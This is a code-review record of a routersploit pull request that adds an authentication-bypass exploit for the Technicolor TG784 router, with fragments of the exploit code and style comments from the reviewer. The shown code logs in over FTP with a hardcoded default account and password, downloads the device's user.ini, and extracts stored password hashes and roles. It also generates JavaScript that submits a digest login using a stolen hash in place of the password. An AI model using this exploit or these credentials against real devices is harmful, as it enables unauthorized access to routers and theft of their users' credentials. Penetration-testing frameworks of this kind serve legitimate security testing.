### PR TITLE
Technicolor TG784 Authentication Bypass

### PR DESCRIPTION
**Pull request by lucyoa**
Resolves: #41

### CODE REVIEW

File: routersploit/modules/exploits/technicolor/tg784_authbypass.py [hunk 1]
```diff
@@ -0,0 +1,152 @@
...
+                if creds:
+                    print_success("Found encrypted credentials:")
+                    print_table(('Name', 'Password', 'Role', 'Hash2', 'Crypt'), *creds)
+                    return creds
+                else:
+                    print_error("Exploit failed - could not find any credentials")
+        except ftplib.all_errors:
+            print_error("Exploit failed - FTP error")
+
+        return None
```
Comment (fwkz) [inline routersploit/modules/exploits/technicolor/tg784_authbypass.py]: This is redundant.

File: routersploit/modules/exploits/technicolor/tg784_authbypass.py [hunk 2]
```diff
@@ -0,0 +1,152 @@
...
+            tn.read_until(': ')
+            tn.write(self.remote_pass + '\r\n')
+            response = tn.read_until("Login not allowed", 10)
+            tn.close()
+        except:
+            return ""
+
+        return response
+
+    def is_port_opened(self, port):
```
Comment (fwkz) [inline routersploit/modules/exploits/technicolor/tg784_authbypass.py]: This is class method that have access to `self.port` is there any reason why we pass it as an argument?

File: routersploit/modules/exploits/technicolor/tg784_authbypass.py [hunk 3]
```diff
@@ -0,0 +1,152 @@
...
+
+    ftp_port = exploits.Option(21, 'Target FTP port')
+    telnet_port = exploits.Option(23, 'Target Telnet port')
+
+    remote_user = exploits.Option('upgrade', 'Default FTP username')
+    remote_pass = exploits.Option('Th0ms0n!', 'Default FTP password for "upgrade" user')
+
+    config_path = exploits.Option('user.ini', 'Path to config file')
+
+    def run(self):
```
Comment (fwkz) [inline routersploit/modules/exploits/technicolor/tg784_authbypass.py]: Clearly we have 2 separate ways of bypassing auth so I suggest splitting this method into couple of smaller ones.

File: routersploit/modules/exploits/technicolor/tg784_authbypass.py [hunk 4]
```diff
@@ -0,0 +1,152 @@
...
+                           'var HA2 = MD5("GET" + ":" + uri);\n'
+                           'document.getElementById("user").value = user;\n'
+                           'document.getElementById("hidepw").value = MD5(hash2 + ":" + nonce +":" + "00000001" + ":" + "xyz" + ":" + qop + ":" + HA2);\n'
+                           'document.authform.submit();\n')
+
+                for user in creds:
+                    print_success("User: {} Role: {}".format(user[0], user[2]))
+                    print_info(payload.format(user[0], user[3]))
+
+        elif '}=>' in response:
```
Comment (fwkz) [inline routersploit/modules/exploits/technicolor/tg784_authbypass.py]: I would move this into `self.telnet_login()` and rewrite it so it returns `True` or `False`, that way we could simplify to:
```python
if self.telnet_login():
    print_success("Successful authentication through Telnet service")
    # ...
else:
    # bypass via ftp
```

File: routersploit/modules/exploits/technicolor/tg784_authbypass.py [hunk 5]
```diff
@@ -0,0 +1,152 @@
...
+                r = StringIO()
+                ftp.retrbinary('RETR {}'.format(self.config_path), r.write)
+                ftp.close()
+                data = r.getvalue()
+
+                creds = re.findall(r'add name=(.*) password=(.*) role=(.*) hash2=(.*) crypt=(.*)\r\n', data)
+                if creds:
+                    print_success("Found encrypted credentials:")
+                    print_table(('Name', 'Password', 'Role', 'Hash2', 'Crypt'), *creds)
+                    return creds
```
Comment (fwkz) [inline routersploit/modules/exploits/technicolor/tg784_authbypass.py]: `nametuple` so we can access this easily?

File: routersploit/modules/exploits/technicolor/tg784_authbypass.py (hunk 2 above)
Comment (lucyoa) [inline routersploit/modules/exploits/technicolor/tg784_authbypass.py]: Exploit logic involves checking different port like http_port, ftp_port etc. Thats why it is passed as an argument.

**Comment by fwkz** [comment]
We no longer have access to the device. Merging as is ;(

**Pull request merged**